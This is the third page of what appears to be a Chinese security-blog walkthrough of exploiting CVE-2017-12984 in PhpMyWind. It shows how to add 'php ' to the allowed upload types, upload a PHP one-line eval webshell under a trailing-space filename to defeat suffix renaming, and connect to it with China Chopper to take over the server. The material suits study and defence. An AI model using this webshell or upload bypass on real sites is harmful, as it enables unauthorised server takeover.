www.xiahuhu.cn
关注网络安全

Phpmywind XSS利用(CVE-2017-12984)

3、获取服务器权限

打开网站系统管理,选择网站信息配置,点击附件设置,我们可以看见后台可设置上传图片的类型,在上传图片类型后面加上

|php |,提交。后台会保存变量并更新配置文件。

 

注意|php |后面的空格,上传图片时,服务器会重命名并在文件名后添加后缀,空格是用来截断自动添加的后缀。

 

 

 

新建一个PHP一句话木马:<?php @eval($_POST[‘A’]);?>,并命名为yijuhua.png。

 

 

 

修改filename为”yijuhua.php “,注意.php后面有空格,点击intercept on关闭截取状态。

 

 

 

 

 

可以看到文件已经上传成功,并重命名为1539244142.php,上传目录为:uploads/image/20181011/1539244142.php

 

 

 

 

 


 直接通过菜刀连接,连接成功,获取服务器权限。 

 

1 2 3
赞(2) 打赏
未经允许不得转载:花生米's Blog » Phpmywind XSS利用(CVE-2017-12984)
分享到: 更多 (0)

评论 1

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #1

    😛 😛

    呼呼 4个月前 (01-14) 来自天朝的朋友 谷歌浏览器 Windows 10 回复

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏